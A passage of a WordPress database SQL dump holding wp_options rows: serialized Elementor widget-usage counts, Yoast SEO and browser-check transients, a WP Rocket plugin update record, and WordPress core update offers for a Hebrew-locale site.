typography_font_size\";i:4;s:22:\"typography_font_weight\";i:4;s:12:\"align_tablet\";i:4;s:12:\"align_mobile\";i:4;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:20;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:5:{s:5:\"title\";i:19;s:5:\"align\";i:1;s:11:\"header_size\";i:14;s:12:\"align_tablet\";i:4;s:12:\"align_mobile\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:13;s:21:\"typography_typography\";i:12;s:20:\"typography_font_size\";i:12;s:22:\"typography_font_weight\";i:12;s:25:\"typography_text_transform\";i:12;}}}}s:4:\"form\";a:2:{s:5:\"count\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:7:{s:19:\"section_form_fields\";a:4:{s:11:\"form_fields\";i:8;s:10:\"input_size\";i:7;s:11:\"show_labels\";i:8;s:9:\"form_name\";i:7;}s:21:\"section_submit_button\";a:4:{s:11:\"button_size\";i:5;s:12:\"button_width\";i:5;s:20:\"selected_button_icon\";i:1;s:11:\"button_text\";i:7;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:7;s:10:\"email_from\";i:7;s:15:\"email_from_name\";i:7;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:7;s:12:\"email_from_2\";i:7;s:17:\"email_from_name_2\";i:7;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:7;s:13:\"error_message\";i:7;s:22:\"required_field_message\";i:7;s:15:\"invalid_message\";i:7;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:1;}s:15:\"section_webhook\";a:2:{s:8:\"webhooks\";i:1;s:22:\"webhooks_advanced_data\";i:1;}}s:5:\"style\";a:3:{s:20:\"section_button_style\";a:9:{s:17:\"button_text_color\";i:5;s:23:\"button_background_color\";i:4;s:28:\"button_typography_typography\";i:4;s:27:\"button_typography_font_size\";i:4;s:29:\"button_typography_font_weight\";i:4;s:32:\"button_typography_text_transform\";i:4;s:20:\"button_border_radius\";i:4;s:29:\"button_background_hover_color\";i:4;s:18:\"button_hover_color\";i:4;}s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:4;s:7:\"row_gap\";i:4;s:11:\"label_color\";i:4;s:27:\"label_typography_typography\";i:4;s:26:\"label_typography_font_size\";i:4;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:4;s:27:\"field_typography_typography\";i:4;s:26:\"field_typography_font_size\";i:4;s:28:\"field_typography_font_weight\";i:4;s:18:\"field_border_width\";i:4;s:19:\"field_border_radius\";i:4;}}}}s:15:\"theme-site-logo\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:6;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:3;s:12:\"width_mobile\";i:3;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:3;s:5:\"image\";i:3;s:5:\"align\";i:3;s:4:\"link\";i:3;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:3;s:14:\"animation_line\";i:3;s:14:\"animation_text\";i:3;s:7:\"pointer\";i:3;s:8:\"dropdown\";i:3;s:10:\"full_width\";i:3;s:20:\"animation_background\";i:3;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:3;s:21:\"color_menu_item_hover\";i:3;s:29:\"pointer_color_menu_item_hover\";i:3;s:26:\"menu_typography_typography\";i:3;s:25:\"menu_typography_font_size\";i:3;s:13:\"pointer_width\";i:3;s:30:\"menu_typography_text_transform\";i:3;s:22:\"color_menu_item_active\";i:3;s:26:\"padding_vertical_menu_item\";i:3;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:3;s:30:\"background_color_dropdown_item\";i:3;s:25:\"color_dropdown_item_hover\";i:3;s:36:\"background_color_dropdown_item_hover\";i:3;s:30:\"dropdown_typography_typography\";i:3;s:29:\"dropdown_typography_font_size\";i:3;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:3;s:18:\"toggle_color_hover\";i:3;s:11:\"toggle_size\";i:3;s:19:\"toggle_border_width\";i:3;s:20:\"toggle_border_radius\";i:3;s:23:\"toggle_background_color\";i:3;}}}}s:11:\"breadcrumbs\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:9:\"icon-list\";a:2:{s:5:\"count\";i:9;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:9;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:2:{s:10:\"icon_align\";i:1;s:13:\"space_between\";i:8;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:9;}s:18:\"section_text_style\";a:7:{s:11:\"text_indent\";i:9;s:26:\"icon_typography_typography\";i:9;s:25:\"icon_typography_font_size\";i:9;s:27:\"icon_typography_line_height\";i:1;s:10:\"text_color\";i:8;s:27:\"icon_typography_font_weight\";i:8;s:32:\"icon_typography_font_size_tablet\";i:8;}}}}}s:6:\"header\";a:4:{s:15:\"theme-site-logo\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:1;s:19:\"_inline_size_mobile\";i:2;s:19:\"_inline_size_tablet\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:7:{s:13:\"custom_height\";i:1;s:16:\"content_position\";i:1;s:6:\"height\";i:1;s:20:\"custom_height_mobile\";i:1;s:20:\"custom_height_tablet\";i:1;s:15:\"stretch_section\";i:2;s:3:\"gap\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;s:18:\"background_color_b\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:14:\"padding_tablet\";i:2;s:14:\"padding_mobile\";i:2;s:7:\"padding\";i:1;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}}s:6:\"single\";a:15:{s:15:\"theme-site-logo\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:2;s:12:\"width_mobile\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:2;s:5:\"image\";i:2;s:5:\"align\";i:2;s:4:\"link\";i:2;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:17;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:14;s:19:\"_inline_size_mobile\";i:8;s:19:\"_inline_size_tablet\";i:10;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:2;s:13:\"margin_mobile\";i:2;s:14:\"padding_tablet\";i:2;s:14:\"padding_mobile\";i:4;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:21:\"background_background\";i:1;s:16:\"background_image\";i:1;s:19:\"background_position\";i:1;s:15:\"background_size\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:11;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:8:{s:13:\"custom_height\";i:3;s:16:\"content_position\";i:5;s:6:\"height\";i:3;s:20:\"custom_height_mobile\";i:3;s:20:\"custom_height_tablet\";i:3;s:3:\"gap\";i:2;s:6:\"layout\";i:1;s:15:\"column_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:7;s:16:\"background_color\";i:7;s:18:\"background_color_b\";i:4;s:25:\"background_gradient_angle\";i:2;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:4;s:12:\"border_width\";i:4;s:12:\"border_color\";i:4;}}s:8:\"advanced\";a:3:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:4;s:14:\"padding_tablet\";i:6;s:14:\"padding_mobile\";i:6;s:7:\"padding\";i:4;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:2;}s:19:\"_section_responsive\";a:1:{s:20:\"reverse_order_mobile\";i:1;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:2;s:14:\"animation_line\";i:2;s:14:\"animation_text\";i:2;s:7:\"pointer\";i:2;s:8:\"dropdown\";i:2;s:10:\"full_width\";i:2;s:20:\"animation_background\";i:2;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:2;s:21:\"color_menu_item_hover\";i:2;s:29:\"pointer_color_menu_item_hover\";i:2;s:26:\"menu_typography_typography\";i:2;s:25:\"menu_typography_font_size\";i:2;s:13:\"pointer_width\";i:2;s:30:\"menu_typography_text_transform\";i:2;s:22:\"color_menu_item_active\";i:2;s:26:\"padding_vertical_menu_item\";i:2;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:2;s:30:\"background_color_dropdown_item\";i:2;s:25:\"color_dropdown_item_hover\";i:2;s:36:\"background_color_dropdown_item_hover\";i:2;s:30:\"dropdown_typography_typography\";i:2;s:29:\"dropdown_typography_font_size\";i:2;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:2;s:18:\"toggle_color_hover\";i:2;s:11:\"toggle_size\";i:2;s:19:\"toggle_border_width\";i:2;s:20:\"toggle_border_radius\";i:2;s:23:\"toggle_background_color\";i:2;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:9;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:5:{s:5:\"title\";i:9;s:11:\"header_size\";i:8;s:12:\"align_tablet\";i:2;s:12:\"align_mobile\";i:2;s:5:\"align\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:8:{s:11:\"title_color\";i:8;s:21:\"typography_typography\";i:8;s:20:\"typography_font_size\";i:8;s:22:\"typography_font_weight\";i:7;s:25:\"typography_text_transform\";i:7;s:22:\"typography_line_height\";i:2;s:27:\"typography_font_size_tablet\";i:2;s:27:\"typography_font_size_mobile\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:3:{s:8:\"_padding\";i:1;s:14:\"_margin_mobile\";i:1;s:15:\"_padding_tablet\";i:1;}}}}s:4:\"form\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:3;s:11:\"form_fields\";i:3;s:11:\"show_labels\";i:3;s:10:\"input_size\";i:2;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:3;s:12:\"button_width\";i:2;s:11:\"button_size\";i:2;}s:13:\"section_email\";a:4:{s:13:\"email_subject\";i:3;s:10:\"email_from\";i:3;s:15:\"email_from_name\";i:3;s:8:\"email_to\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:3;s:12:\"email_from_2\";i:3;s:17:\"email_from_name_2\";i:3;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:3;s:13:\"error_message\";i:3;s:22:\"required_field_message\";i:3;s:15:\"invalid_message\";i:3;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:2;s:7:\"row_gap\";i:2;s:11:\"label_color\";i:2;s:27:\"label_typography_typography\";i:2;s:26:\"label_typography_font_size\";i:2;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:2;s:27:\"field_typography_typography\";i:2;s:26:\"field_typography_font_size\";i:2;s:28:\"field_typography_font_weight\";i:2;s:18:\"field_border_width\";i:2;s:19:\"field_border_radius\";i:2;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:2;s:17:\"button_text_color\";i:2;s:28:\"button_typography_typography\";i:2;s:27:\"button_typography_font_size\";i:2;s:29:\"button_typography_font_weight\";i:2;s:32:\"button_typography_text_transform\";i:2;s:20:\"button_border_radius\";i:2;s:29:\"button_background_hover_color\";i:2;s:18:\"button_hover_color\";i:2;}}}}s:9:\"icon-list\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:4;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:4;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:4;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:4;s:11:\"text_indent\";i:4;s:26:\"icon_typography_typography\";i:4;s:25:\"icon_typography_font_size\";i:4;s:27:\"icon_typography_font_weight\";i:4;s:32:\"icon_typography_font_size_tablet\";i:4;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;s:12:\"align_tablet\";i:2;s:12:\"align_mobile\";i:2;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_button\";a:5:{s:4:\"text\";i:1;s:4:\"size\";i:1;s:5:\"align\";i:1;s:11:\"icon_indent\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:21:\"typography_typography\";i:1;s:25:\"typography_text_transform\";i:1;s:13:\"border_radius\";i:1;s:25:\"typography_letter_spacing\";i:1;s:27:\"typography_font_size_tablet\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:3:{s:7:\"_margin\";i:1;s:14:\"_margin_tablet\";i:1;s:14:\"_margin_mobile\";i:1;}}}}s:6:\"spacer\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:12:\"space_mobile\";i:1;}}}}s:11:\"breadcrumbs\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}}}s:16:\"theme-post-title\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}}}s:9:\"post-info\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:1:{s:17:\"section_icon_list\";a:2:{s:13:\"space_between\";i:1;s:10:\"icon_align\";i:1;}}}}s:25:\"theme-post-featured-image\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:18:\"theme-post-content\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:0:{}}}s:6:\"footer\";a:6:{s:7:\"heading\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;s:25:\"typography_text_transform\";i:2;}}}}s:9:\"icon-list\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:1;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:1;s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_font_weight\";i:1;s:32:\"icon_typography_font_size_tablet\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:4;s:19:\"_inline_size_tablet\";i:2;s:19:\"_inline_size_mobile\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;s:5:\"align\";i:1;}}}}s:4:\"form\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:4:{s:8:\"email_to\";i:1;s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:2:{s:16:\"content_position\";i:1;s:15:\"stretch_section\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;s:18:\"background_color_b\";i:1;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}}}','no'),(34285,'_elementor_global_css','a:5:{s:4:\"time\";i:1589450695;s:5:\"fonts\";a:1:{i:0;s:16:\"Open Sans Hebrew\";}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;b:0;}','yes'),(34286,'elementor_active_kit','796','yes'),(35010,'_transient_timeout_wpseo_link_table_inaccessible','1622464992','no'),(35011,'_transient_wpseo_link_table_inaccessible','0','no'),(35012,'_transient_timeout_wpseo_meta_table_inaccessible','1622464992','no'),(35013,'_transient_wpseo_meta_table_inaccessible','0','no'),(36910,'_site_transient_update_wprocket_response','O:8:\"stdClass\":5:{s:4:\"slug\";s:9:\"wp-rocket\";s:6:\"plugin\";s:23:\"wp-rocket/wp-rocket.php\";s:11:\"new_version\";s:7:\"3.6.2.1\";s:3:\"url\";s:20:\"https://wp-rocket.me\";s:7:\"package\";s:51:\"https://wp-rocket.me/bc382482/wp-rocket_3.6.2.1.zip\";}','no'),(36911,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:5:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:65:\"https://downloads.wordpress.org/release/he_IL/wordpress-5.4.2.zip\";s:6:\"locale\";s:5:\"he_IL\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:65:\"https://downloads.wordpress.org/release/he_IL/wordpress-5.4.2.zip\";s:10:\"no_content\";b:0;s:11:\"new_bundled\";b:0;s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.4.2\";s:7:\"version\";s:5:\"5.4.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.4.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.4.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.4.2\";s:7:\"version\";s:5:\"5.4.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.4.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.4.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.4.2\";s:7:\"version\";s:5:\"5.4.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.3.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.3.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.3.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.3.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.3.4\";s:7:\"version\";s:5:\"5.3.4\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.7.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.7.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.2.7-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.2.7-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.2.7\";s:7:\"version\";s:5:\"5.2.7\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1596695016;s:15:\"version_checked\";s:5:\"5.1.6\";s:12:\"translations\";a:0:{}}','no'),(38103,'_site_transient_timeout_browser_72f533ef66d493b897f3cfc643e15448','1597042202','no'),(38104,'_site_transient_browser_72f533ef66d493b897f3cfc643e15448','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"84.0.4147.105\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(38105,'_site_transient_timeout_php_check_a10e539f660cc06b0ad46898f5988f88','1597042203','no'),(38106,'_site_transient_php_check_a10e539f660cc06b0ad46898f5988f88','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_versi